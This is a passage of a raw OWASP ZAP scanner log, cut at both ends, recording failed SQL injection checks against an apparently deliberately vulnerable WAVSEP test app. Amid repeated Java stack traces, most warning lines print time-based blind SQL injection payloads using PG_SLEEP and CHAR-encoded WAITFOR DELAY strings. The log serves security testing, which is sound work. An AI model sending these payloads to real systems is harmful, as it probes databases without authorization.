org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682122 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5199=(SELECT 5199 FROM PG_SLEEP(5)) AND (8297=8297] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5199=(SELECT 5199 FROM PG_SLEEP(5)) AND (8297=8297 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682123 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682123 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6595=(SELECT 6595 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6595=(SELECT 6595 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682124 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682124 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3454=(SELECT 3454 FROM PG_SLEEP(5)) AND ('VNlj'='VNlj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3454=(SELECT 3454 FROM PG_SLEEP(5)) AND ('VNlj'='VNlj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682125 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6441=(SELECT 6441 FROM PG_SLEEP(5)) AND 'bdjm'='bdjm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 6441=(SELECT 6441 FROM PG_SLEEP(5)) AND 'bdjm'='bdjm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682126 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682127 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 6981=(SELECT 6981 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 6981=(SELECT 6981 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682128 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3369=(SELECT 3369 FROM PG_SLEEP(5))-- XuEL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3369=(SELECT 3369 FROM PG_SLEEP(5))-- XuEL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682128 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682129 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (3416=3416] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (3416=3416 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682130 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682131 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at 